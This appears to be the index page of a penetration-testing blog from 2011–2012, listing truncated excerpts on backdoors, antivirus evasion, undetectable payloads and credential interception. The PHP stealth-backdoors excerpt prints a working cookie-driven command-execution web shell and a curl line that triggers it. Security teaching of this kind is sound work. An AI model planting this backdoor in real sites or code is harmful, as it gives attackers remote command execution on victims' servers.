Coresec - coresec.org - Coresec.org - Information Security Blog
Latest News:
Permanent Reverse Backdoor for IPhone / IPad 24 Apr 2012 | 11:50 pm
During a security audit I gained access to a jailbroken iPhone 4 by using an SSH brute-force attack. I was able to connect to the device using SSH and I tried to install a permanent reverse tcp backdo...
Windows Dictionary Attacks 15 Apr 2012 | 06:05 am
In this article, Scott Sutherland describes how to perform dictionary attacks against Active Directory accounts safely. Identify domains; Enumerate domain controllers; Enumerate users from domain contro...
PHP Stealth Backdoors 31 Mar 2012 | 07:57 am
1) Using cookie: <?php @header('Hidden-Field: '.@exec($_COOKIE['cmd'])); echo "<p>hello</p>"; ?> Example: curl 'http://target/cookie.php' -b 'cmd=id' -A 'Mozilla/5.0 (Macintosh; U; Inte...
Cymothoa – Inject Shellcode into an existing process 24 Dec 2011 | 12:51 pm
Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix) to manipulate processes and infect ...
Disabling AntiVirus during Pen Testing 6 Dec 2011 | 09:47 am
When penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage. Unfortunately today, the antivirus vendors have beco...
FUD Payload Generator for Backtrack 10 Nov 2011 | 11:28 am
Today, based on Astr0baby's article on how we can create a fully undetectable Metasploit payload, I modified his REVERSE_TCP Payload Generator in order to work with the Backtrack 5 distro. Below you can fi...
[Tip] OpenVAS Fast Start 10 Nov 2011 | 10:15 am
OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. pen@test:~# apt-get install openvas pen@test:~#...
Intercepting Authentication Credentials Stored in Multifunction Printers 2 Nov 2011 | 06:57 am
During Defcon 19, percX from foofus.net discussed a new attack method against printers. This attack method involved tricking the printer into passing LDAP or SMB credentials back to the attacker in plain ...
Social Engineering Poll – Endearment vs Authority 13 Oct 2011 | 07:00 am
Endearment vs Authority: This poll was based on two different stories. The first showed the principle of endearment and how it may be used by a malicious social engineer. The second story involved ...
Generate and Manage Stealth PHP backdoors 9 Oct 2011 | 06:44 am
Weevely creates and manages a PHP trojan designed to be hardly detectable. It is a proof of concept of an unobtrusive PHP backdoor that simulates a complete telnet-like connection, hidden data in HTTP refere...